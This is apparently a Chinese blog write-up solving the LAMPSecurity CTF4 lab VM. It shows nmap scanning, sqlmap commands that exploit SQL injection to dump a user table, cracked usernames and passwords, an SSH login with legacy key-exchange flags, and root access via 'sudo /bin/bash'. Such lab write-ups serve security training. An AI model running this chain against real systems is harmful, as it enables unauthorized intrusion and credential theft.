LAMPSecurity——CTF4

情报收集

  1. 利用nmap进行内网网段扫描

    nmap -sS -Pn 192.168.16.0/24
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    这里发现192.168.16.153开启了22(ssh)、25(smtp)、80(http)、631(ipp)四个端口,可以判断是我们需要渗透的靶机

    接下来利用nmap进行进一步端口扫描,看看有没有非常见端口

    nmap -T 4 -A -p 1-65535 -O 192.168.16.153
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    没有发现新的端口

  2. 访问web界面(80端口)

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    在blog界面发现有id=2这种猜测可能存在SQL注入

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    简单在后面加一个’试试

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    发现报错是mysql的错误,断定存在SQL注入

SQL注入

  1. 利用sqlmap进行爆库

    sqlmap -u "http://192.168.16.153/index.html?page=blog&title=Blog&id=5" --batch --dbs
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  2. 选择ehks进行爆表

    sqlmap -u "http://192.168.16.153/index.html?page=blog&title=Blog&id=5" --batch -D "ehks"  --tables
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  3. 选择user进行爆列

    sqlmap -u "http://192.168.16.153/index.html?page=blog&title=Blog&id=5" --batch -D "roundcubemail"  -T "user" --columns
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  4. 选择username进行爆字段

    sqlmap -u "http://192.168.16.153/index.html?page=blog&title=Blog&id=5" --batch -D "ehks" -T "user" -C "user_name,user_pass" --dump
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    得到的用户名和密码如下

    | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
    | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
    | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
    | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
    | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
    | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)  
    

SSH 爆破

  1. 将得到的用户名保存在ctf-user中

    dstevens

    achen

    pmoore

    jdurbin

    sorzek

    ghighland

    将得到的密码保存在ctf-pass中

    ilike2surf

    seventysixers

    Homesite

    Sue1978

    pacman

    undone1

  2. 利用hydra进行爆破

    尝试了很多次发现均报错

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    后来查看了一些大佬的博客发现这里报错的原因是ssh太老了,因此需要添加-oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss
    即密钥交换的方法

    ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-dss dstevens@192.168.16.153
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    顺利进入服务器内部

提权

  1. 这里sudo -l看有哪些可以提权的命令

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

    发现都可以

  2. 那么直接/bin/bash提权了

    sudo /bin/bash
    

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

总结

这个靶场总体来说比较简单(比上周做的DC系列更简单),正常的nmap进行端口信息收集,然后在Web页面发现SQL注入漏洞,借助sqlmap顺利拿到用户和其密码信息。但是在SSH爆破时因为靶场时间太久了,密钥交换的算法不一致导致被一直无法正常爆破,后来通过大佬的指点通过设置密钥算法的参数完成登录。最后的提权部分就是/bin/bash提权就行

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值